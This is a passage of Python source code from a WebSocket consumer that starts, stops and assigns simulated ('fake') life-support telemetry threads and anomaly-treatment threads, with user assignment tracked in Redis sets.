# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[2].is_alive():
global_obj.hub_to_simulator_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[2].is_alive():
print('There was an error stopping fake simulator thread three.')
# unassign anyway
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[2].is_alive and global_obj.simulator_at_threads[2].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_three'})
# Ensure it gets stopped
global_obj.simulator_threads[2].join(2.0)
if global_obj.simulator_threads[2].is_alive():
print('There was an error stopping fake telemetry thread three.')
global_obj.simulator_at_threads[2].join(2.0)
if global_obj.simulator_at_threads[2].is_alive():
print('There was an error stopping fake at thread three.')
# Unassign anyway
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[2].is_alive():
global_obj.hub_to_simulator_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[2].is_alive():
print('There was an error stopping fake simulator thread three.')
# Unassign anyway
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[2].is_alive():
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[2].is_alive():
print('There was an error stopping fake at thread three.')
# Unassign anyway
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# Check if both are dead then unassign
else:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
elif r.sismember('fake-telemetry-four', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[3] is None and global_obj.simulator_at_threads[3] is None:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[3] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[3].is_alive():
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[3].is_alive():
print('There was an error stopping fake at thread four.')
# Unassign anyway
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[3] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[3].is_alive():
global_obj.hub_to_simulator_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[3].is_alive():
print('There was an error stopping fake simulator thread four.')
# unassign anyway
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[3].is_alive and global_obj.simulator_at_threads[3].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_four'})
# Ensure it gets stopped
global_obj.simulator_threads[3].join(2.0)
if global_obj.simulator_threads[3].is_alive():
print('There was an error stopping fake telemetry thread four.')
global_obj.simulator_at_threads[3].join(2.0)
if global_obj.simulator_at_threads[3].is_alive():
print('There was an error stopping fake at thread four.')
# Unassign anyway
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[3].is_alive():
global_obj.hub_to_simulator_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[3].is_alive():
print('There was an error stopping fake simulator thread four.')
# Unassign anyway
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[3].is_alive():
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[3].is_alive():
print('There was an error stopping fake at thread four.')
# Unassign anyway
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Check if both are dead then unassign
else:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Remove the user from the all users group
r.srem("all-users", self.channel_name)
if r.sismember("all-users", self.channel_name) == 1:
print(f"Error removing {self.channel_name} from the all users group.")
else:
print(f"Success removing {self.channel_name} from the all users group. There are {r.scard('all-users')} "
f"left in the all channels group. The all users group contains {r.smembers('all-users')}")
if r.scard("all-users") == 0:
# Clear all redis variables if no one is on
r.delete("seclss-group-users")
r.delete("fake-telemetry-one")
r.delete("fake-telemetry-two")
r.delete("fake-telemetry-three")
r.delete("fake-telemetry-four")
r.delete("all-users")
print("Cleared on redis variables.")
# Then call function from base class, and then add the new behavior
super(ATConsumer, self).disconnect(close_code)
def receive_json(self, content, **kwargs):
"""
Called when we get a text frame. Channels will JSON-decode the payload
for us and pass it as the first argument.
"""
# First call function from base class
super(ATConsumer, self).receive_json(content, **kwargs)
# Then add new behavior
# key = self.scope['path'].lstrip('api/')
# Get an updated session store
user_info = get_user_information(self.scope['session'], self.scope['user'])
r = redis.Redis()
# Update context to SQL one
if content.get('msg_type') == 'context_add':
for subcontext_name, subcontext in content.get('new_context').items():
for key, value in subcontext.items():
setattr(getattr(user_info, subcontext_name), key, value)
getattr(user_info, subcontext_name).save()
user_info.save()
elif content.get('type') == 'start_hub_thread':
# If the hub thread is none then it has never been started so start it
if global_obj.hub_thread is None:
# Hub thread initialization
global_obj.hub_thread = threading.Thread(target=hub_routine,
name="Hub Thread",
args=(global_obj.frontend_to_hub_queue,
global_obj.sEclss_to_hub_queue,
global_obj.hera_to_hub_queue,
global_obj.simulator_to_hub_queues[0],
global_obj.simulator_to_hub_queues[1],
global_obj.simulator_to_hub_queues[2],
global_obj.simulator_to_hub_queues[3],
global_obj.hub_to_sEclss_queue,
global_obj.hub_to_hera_queue,
global_obj.hub_to_simulator_queues[0],
global_obj.hub_to_simulator_queues[1],
global_obj.hub_to_simulator_queues[2],
global_obj.hub_to_simulator_queues[3],
global_obj.hub_to_sEclss_at_queue,
global_obj.hub_to_hera_at_queue,
global_obj.hub_to_simulator_at_queues[0],
global_obj.hub_to_simulator_at_queues[1],
global_obj.hub_to_simulator_at_queues[2],
global_obj.hub_to_simulator_at_queues[3],
global_obj.sEclss_at_to_hub_queue,
global_obj.hera_at_to_hub_queue,
global_obj.simulator_at_to_hub_queues[0],
global_obj.simulator_at_to_hub_queues[1],
global_obj.simulator_at_to_hub_queues[2],
global_obj.simulator_at_to_hub_queues[3]
))
global_obj.hub_thread.start()
# Ensure the hub thread started
if global_obj.hub_thread.is_alive():
print("Hub thread started.")
self.send(json.dumps({
'type': 'hub_thread_response',
'content': {'status': 'success',
'message': 'Success starting the hub thread.',
'attempt': content.get('attempt')}
}))
# If it hasn't started then send back an error
else:
self.send(json.dumps({
'type': 'hub_thread_response',
'content': {'status': 'error',
'message': 'Error starting the hub thread.',
'attempt': content.get('attempt')}
}))
# If the hub thread is not None then check to see if it is alive or not
else:
# If it is alive then send back already running
if global_obj.hub_thread.is_alive():
self.send(json.dumps({
'type': 'hub_thread_response',
'content': {'status': 'already_running',
'message': 'The hub thread was already running. This is fine if someone else is '
'using Daphne at.',
'attempt': content.get('attempt')}
}))
# If it is not alive then reinitialize it and restart it
else:
# Hub thread initialization
global_obj.hub_thread = threading.Thread(target=hub_routine,
name="Hub Thread",
args=(global_obj.frontend_to_hub_queue,
global_obj.sEclss_to_hub_queue,
global_obj.hera_to_hub_queue,
global_obj.simulator_to_hub_queues[0],
global_obj.simulator_to_hub_queues[1],
global_obj.simulator_to_hub_queues[2],
global_obj.simulator_to_hub_queues[3],
global_obj.hub_to_sEclss_queue,
global_obj.hub_to_hera_queue,
global_obj.hub_to_simulator_queues[0],
global_obj.hub_to_simulator_queues[1],
global_obj.hub_to_simulator_queues[2],
global_obj.hub_to_simulator_queues[3],
global_obj.hub_to_sEclss_at_queue,
global_obj.hub_to_hera_at_queue,
global_obj.hub_to_simulator_at_queues[0],
global_obj.hub_to_simulator_at_queues[1],
global_obj.hub_to_simulator_at_queues[2],
global_obj.hub_to_simulator_at_queues[3],
global_obj.sEclss_at_to_hub_queue,
global_obj.hera_at_to_hub_queue,
global_obj.simulator_at_to_hub_queues[0],
global_obj.simulator_at_to_hub_queues[1],
global_obj.simulator_at_to_hub_queues[2],
global_obj.simulator_at_to_hub_queues[3]
))
global_obj.hub_thread.start()
# Ensure the hub thread started
if global_obj.hub_thread.is_alive():
print("Hub thread started.")
self.send(json.dumps({
'type': 'hub_thread_response',
'content': {'status': 'success',
'message': 'Success starting the hub thread.',
'attempt': content.get('attempt')}
}))
# If it hasn't started then send back an error
else:
self.send(json.dumps({
'type': 'hub_thread_response',
'content': {'status': 'error',
'message': 'Error starting the hub thread.',
'attempt': content.get('attempt')}
}))
elif content.get('type') == 'start_fake_telemetry':
# Check if this user is already assigned to a fake telemetry
if r.sismember("fake-telemetry-one", self.channel_name):
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_assigned',
'message': 'This user is already assigned to fake telemetry one.',
'attempt': content.get('attempt')
}
}))
elif r.sismember("fake-telemetry-two", self.channel_name):
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_assigned',
'message': 'This user is already assigned to fake telemetry two.',
'attempt': content.get('attempt')
}
}))
elif r.sismember("fake-telemetry-three", self.channel_name):
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_assigned',
'message': 'This user is already assigned to fake telemetry three.',
'attempt': content.get('attempt')
}
}))
elif r.sismember("fake-telemetry-four", self.channel_name):
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_assigned',
'message': 'This user is already assigned to fake telemetry four.',
'attempt': content.get('attempt')
}
}))
# Check if simulator 1 is assigned to a user
elif r.scard('fake-telemetry-one') == 0:
# Check if simulator at thread 1 has not been initialized, then initialize it
if global_obj.simulator_at_threads[0] is None:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[0] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 1",
args=(
global_obj.hub_to_simulator_at_queues[0],
global_obj.simulator_at_to_hub_queues[0],
))
global_obj.simulator_at_threads[0].start()
# If simulator at thread 1 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[0].is_alive():
print("Fake AT Thread 1 started.")
# Check if simulator thread 1 has not been initialized, then initialize it
if global_obj.simulator_threads[0] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[0] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 1",
args=(
global_obj.simulator_to_hub_queues[
0],
global_obj.hub_to_simulator_queues[0]
))
global_obj.simulator_threads[0].start()
# If simulator thread 1 start was successful then assign it to fake telemetry 1 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[0].is_alive():
print("Fake Telemetry Thread 1 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 1 and Fake AT Thread 1.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 1 but failure to start fake'
'telemetry thread 1. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 1 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[0].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 1 and fake telemetry thread 1 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[0] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 1",
args=(
global_obj.simulator_to_hub_queues[
0],
global_obj.hub_to_simulator_queues[
0]
))
global_obj.simulator_threads[0].start()
# If simulator thread 1 start was successful then assign it to fake telemetry 1 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[0].is_alive():
print("Fake Telemetry Thread 1 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 1 and Fake AT Thread 1.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 1 but failure to start fake'
'telemetry thread 1. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 1 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 1. Fake telemetry 1 was not started.',
'attempt': content.get('attempt')
}
}))
# Simulator at thread 1 has already been initialized
else:
# Check if alive then handle telemetry feed normally
if global_obj.simulator_at_threads[0].is_alive():
# Check if simulator thread 1 has not been initialized, then initialize it
if global_obj.simulator_threads[0] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[0] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 1",
args=(
global_obj.simulator_to_hub_queues[
0],
global_obj.hub_to_simulator_queues[0]
))
global_obj.simulator_threads[0].start()
# If simulator thread 1 start was successful then assign it to fake telemetry 1 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[0].is_alive():
print("Fake Telemetry Thread 1 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 1 and Fake AT Thread 1 was '
'already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 1 was already running but failure to start fake'
'telemetry thread 1. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 1 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[0].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Fake at thread 1 and fake telemetry thread 1 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[0] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 1",
args=(
global_obj.simulator_to_hub_queues[
0],
global_obj.hub_to_simulator_queues[
0]
))
global_obj.simulator_threads[0].start()
# If simulator thread 1 start was successful then assign it to fake telemetry 1 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[0].is_alive():
print("Fake Telemetry Thread 1 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 1 and Fake AT Thread 1 '
'was already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 1 was already running but failure to start fake'
'telemetry thread 1. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If not alive then reinitialize it and handle telemetry feed normally
else:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[0] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 1",
args=(
global_obj.hub_to_simulator_at_queues[
0],
global_obj.simulator_at_to_hub_queues[
0],
))
global_obj.simulator_at_threads[0].start()
# If simulator at thread 1 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[0].is_alive():
print("Fake AT Thread 1 started.")
# Check if simulator thread 1 has not been initialized, then initialize it
if global_obj.simulator_threads[0] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[0] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 1",
args=(
global_obj.simulator_to_hub_queues[
0],
global_obj.hub_to_simulator_queues[
0]
))
global_obj.simulator_threads[0].start()
# If simulator thread 1 start was successful then assign it to fake telemetry 1 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[0].is_alive():
print("Fake Telemetry Thread 1 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 1 and Fake AT Thread 1.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 1 but failure to start fake'
'telemetry thread 1. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 1 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[0].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 1 and fake telemetry thread 1 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[0] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 1",
args=(
global_obj.simulator_to_hub_queues[
0],
global_obj.hub_to_simulator_queues[
0]
))
global_obj.simulator_threads[0].start()
# If simulator thread 1 start was successful then assign it to fake telemetry 1 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[0].is_alive():
print("Fake Telemetry Thread 1 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 1 and Fake AT Thread 1.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 1 but failure to start fake'
'telemetry thread 1. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 1 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 1. Fake telemetry 1 was not started.',
'attempt': content.get('attempt')
}
}))
# Fake telemetry 2 check
elif r.scard('fake-telemetry-two') == 0:
# Check if simulator at thread 2 has not been initialized, then initialize it
if global_obj.simulator_at_threads[1] is None:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[1] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 2",
args=(
global_obj.hub_to_simulator_at_queues[1],
global_obj.simulator_at_to_hub_queues[1],
))
global_obj.simulator_at_threads[1].start()
# If simulator at thread 2 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[1].is_alive():
print("Fake AT Thread 2 started.")
# Check if simulator thread 2 has not been initialized, then initialize it
if global_obj.simulator_threads[1] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[1] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 2",
args=(
global_obj.simulator_to_hub_queues[
1],
global_obj.hub_to_simulator_queues[1]
))
global_obj.simulator_threads[1].start()
# If simulator thread 2 start was successful then assign it to fake telemetry 2 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[1].is_alive():
print("Fake Telemetry Thread 2 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 2 and Fake AT Thread 2.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 2 and send back error message
else:
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 2 but failure to start fake'
'telemetry thread 2. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 2 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[1].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 2 and fake telemetry thread 2 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[1] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 2",
args=(
global_obj.simulator_to_hub_queues[
1],
global_obj.hub_to_simulator_queues[
1]
))
global_obj.simulator_threads[1].start()
# If simulator thread 2 start was successful then assign it to fake telemetry 2 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[1].is_alive():
print("Fake Telemetry Thread 2 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 2 and Fake AT Thread 2.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 2 and send back error message
else:
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 2 but failure to start fake'
'telemetry thread 2. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 2 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 2. Fake telemetry 2 was not started.',
'attempt': content.get('attempt')
}
}))
# Simulator at thread 2 has already been initialized
else:
# Check if alive then handle telemetry feed normally
if global_obj.simulator_at_threads[1].is_alive():
# Check if simulator thread 2 has not been initialized, then initialize it
if global_obj.simulator_threads[1] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[1] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 2",
args=(
global_obj.simulator_to_hub_queues[
1],
global_obj.hub_to_simulator_queues[1]
))
global_obj.simulator_threads[1].start()
# If simulator thread 2 start was successful then assign it to fake telemetry 2 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[1].is_alive():
print("Fake Telemetry Thread 2 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 2 and Fake AT Thread 2 was '
'already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 2 and send back error message
else:
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 2 was already running but failure to start fake'
'telemetry thread 2. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 2 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[1].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
